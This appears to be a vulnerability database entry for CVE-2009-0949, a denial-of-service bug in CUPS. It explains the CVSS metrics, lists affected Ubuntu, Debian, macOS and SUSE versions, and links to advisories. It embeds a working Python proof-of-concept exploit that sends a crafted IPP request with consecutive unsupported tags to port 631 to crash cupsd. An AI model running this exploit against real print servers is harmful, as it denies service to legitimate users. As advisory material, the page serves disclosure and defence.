CVE-2009-0949 : Detail

CVE-2009-0949

7.5
/
HIGH
6.34%V3
Network
2009-06-09 15:00 +00:00
2018-10-10 16:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The ippReadIO function in cups/ipp.c in cupsd in CUPS before 1.3.10 does not properly initialize memory for IPP request packets, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a scheduler request with two consecutive IPP_TAG_UNSUPPORTED tags.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-908 Use of Uninitialized Resource
The product uses or accesses a resource that has not been initialized.

Metrics

Metric Score Severity CVSS Vector Source
V3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33020

Publication date : 2009-06-01 22:00 +00:00
Author : Anibal Sacco
EDB Verified : Yes

source: https://www.securityfocus.com/bid/35169/info CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. from struct import pack import sys import socket class IppRequest: """ Little class to implement a basic Internet Printing Protocol """ def __init__(self, host, port, printers, hpgl_data="a"): self.printers = printers self.host = host self.port = port self.hpgl_data = hpgl_data self.get_ipp_request() def attribute(self, tag, name, value): data = pack('>B',tag) data += pack('>H',len(name)) data += name data += pack('>H',len(value)) data += value return data def get_http_request(self): http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers http_request += "Content-Type: application/ipp\r\n" http_request += "User-Agent: Internet Print Provider\r\n" http_request += "Host: %s\r\n" % self.host http_request += "Content-Length: %d\r\n" % len(self.ipp_data) http_request += "Connection: Keep-Alive\r\n" http_request += "Cache-Control: no-cache\r\n" return http_request def get_ipp_request(self): operation_attr = self.attribute(0x47, 'attributes-charset', 'utf-8') operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us') operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers)) operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr') operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL') self.ipp_data = "\x01\x00" # version-number: 1.0 self.ipp_data += "\x00\x02" # operation-id: Print-job self.ipp_data += "\x00\x00\x00\x01" # request-id: 1 self.ipp_data += "\x01" # operation-attributes-tag self.ipp_data += "\x0f\x0f" # self.ipp_data += operation_attr self.ipp_data += "\x02" # job-attributes-tag self.ipp_data += "\x03" # end-of-attributes-tag self.ipp_data += self.hpgl_data; return self.ipp_data def main(): try: printer = sys.argv[1] host = sys.argv[2] except: print "[+] Usage: exploit printer_name host" return 0 data = "A"*100 ipp = IppRequest(host,"80", printer, data) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connecting to the host" s.connect((host, 631)) #requests = ipp.get_http_request() #for each in requests: # s.send(each) print "[+] Sending request" s.send(ipp.get_http_request()) s.send("\r\n") print "[+] Sending ipp data" s.send(ipp.get_ipp_request()) print "Response:%s" % s.recv(1024) print "done!" if __name__ == "__main__": sys.exit(main())

Products Mentioned

Configuraton 0

Apple>>Cups >> Version To (excluding) 1.3.10

Configuraton 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 8.04

Canonical>>Ubuntu_linux >> Version 8.10

Canonical>>Ubuntu_linux >> Version 9.04

Configuraton 0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 5.0

Debian>>Debian_linux >> Version 6.0

Configuraton 0

Apple>>Mac_os_x >> Version From (including) 10.0.0 To (excluding) 10.4.11

Apple>>Mac_os_x >> Version From (including) 10.5.0 To (excluding) 10.5.8

Apple>>Mac_os_x_server >> Version From (including) 10.0.0 To (excluding) 10.4.11

Apple>>Mac_os_x_server >> Version From (including) 10.5.0 To (excluding) 10.5.8

Configuraton 0

Opensuse>>Opensuse >> Version 10.3

Suse>>Linux_enterprise >> Version 9.0

Suse>>Linux_enterprise >> Version 10.0

References

http://www.securityfocus.com/bid/35169
Tags : vdb-entry, x_refsource_BID
http://www.debian.org/security/2009/dsa-1811
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/35340
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35342
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-780-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/35328
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2009-1082.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/35685
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT3865
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/36701
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2009-1083.html
Tags : vendor-advisory, x_refsource_REDHAT
http://securitytracker.com/id?1022321
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/35322
Tags : third-party-advisory, x_refsource_SECUNIA
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.